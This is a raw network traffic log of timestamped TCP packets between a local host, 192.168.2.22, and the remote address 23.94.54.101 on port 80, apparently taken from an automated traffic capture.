                                                                                            May 4, 2024 10:02:39.394731998 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394738913 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394751072 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394757032 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394768000 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394782066 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394784927 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394797087 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394809008 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394809961 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394819975 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394831896 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394834995 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394843102 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394855022 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394861937 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394865990 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394879103 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394889116 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394890070 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394907951 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394907951 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394921064 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394932032 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394937038 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394937992 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394951105 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394962072 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394973040 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.394973040 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394984961 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394992113 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.394994974 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395004034 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395015001 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395023108 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395025969 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395035028 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395037889 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395050049 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395061016 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395065069 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395071983 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395082951 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395087004 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395096064 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395109892 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395113945 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395123005 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395133972 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395136118 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395148039 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395159006 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395164967 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395170927 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395181894 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395185947 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395194054 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395206928 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395207882 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395217896 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395230055 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395231009 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395240068 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395251989 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395262957 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395263910 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395271063 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395276070 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395287991 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395299911 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395302057 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395311117 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395322084 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395332098 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395334005 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395347118 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395348072 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395356894 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395373106 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395390987 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395399094 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395411968 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395422935 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395450115 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395581961 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395592928 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395605087 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.395626068 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.395637035 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.397492886 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.401226044 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401249886 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401263952 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401278019 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401293993 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.401333094 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.401647091 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401791096 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.401837111 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.403105021 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403119087 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403131008 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403145075 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403157949 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403162956 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.403172970 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403182983 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.403194904 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403207064 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403219938 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403219938 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.403239965 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.403243065 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.403310061 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.413675070 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.416399956 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.604681969 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604702950 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604824066 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604830980 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.604840040 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604877949 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604892969 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604902983 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.604904890 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604919910 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604926109 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.604952097 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604965925 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604990005 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.604993105 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605003119 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605031967 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605060101 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605098963 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605118036 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605130911 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605144024 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605156898 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605190992 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605202913 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605214119 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605252028 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605276108 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605276108 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605299950 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605313063 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605353117 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605375051 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605389118 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605403900 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605422020 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605429888 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605441093 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605453968 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605462074 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605496883 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605547905 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605604887 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605648994 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605659962 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605671883 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605715990 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605737925 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605752945 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605770111 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605783939 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605793953 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605818033 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605839968 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605853081 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605865002 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605886936 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605907917 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605921030 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605933905 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.605948925 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.605963945 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606003046 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606014967 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606025934 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606040001 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606043100 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606053114 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606065035 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606077909 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606106043 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606245041 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606292009 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606304884 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606317043 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606329918 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606333971 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606343031 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606352091 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606379986 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606381893 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606391907 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606405020 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606424093 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606441021 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606465101 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606479883 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606479883 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606506109 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606517076 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606548071 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606575966 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606586933 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606590033 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606612921 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606631994 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606746912 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606759071 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606770992 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606789112 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606807947 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606868982 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606879950 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606892109 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606904984 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606916904 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606918097 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606930017 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606940031 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606941938 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606954098 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606966019 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.606969118 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.606976986 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607002020 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607008934 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607021093 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607033014 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607050896 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607094049 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607105970 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607137918 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607146978 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607182026 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607193947 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607207060 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607218981 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607230902 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607239008 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607254982 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607275009 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607297897 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607301950 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607333899 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607364893 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607378006 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607388973 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607403994 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607409954 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607434988 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607436895 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607446909 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607475996 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607481003 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607492924 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607513905 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607525110 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607527971 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607541084 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607563019 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607574940 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607588053 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607600927 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607623100 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607656002 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607695103 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607839108 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607851028 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607861996 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607875109 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607887030 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607887983 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607897997 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607909918 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607919931 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607919931 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607932091 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607943058 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607953072 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607955933 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607961893 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607968092 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607980013 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.607990980 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.607995987 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608006954 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608017921 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608020067 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608031034 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608042002 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608043909 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608055115 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608066082 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608068943 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608079910 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608093023 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608093977 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608110905 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608115911 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608124018 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608134031 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608145952 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608145952 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608156919 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608170033 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608175039 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608182907 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608196020 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608200073 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608208895 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608222008 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608223915 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608236074 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608247995 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608248949 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608262062 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608275890 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608277082 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608294010 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608300924 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608306885 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608319044 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608330965 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608333111 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608345032 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608359098 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608361959 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608387947 CEST4916180192.168.2.2223.94.54.101
                                                                                            May 4, 2024 10:02:39.608397007 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608408928 CEST804916123.94.54.101192.168.2.22
                                                                                            May 4, 2024 10:02:39.608419895 CEST804916123.94.54.101192.168.2.22
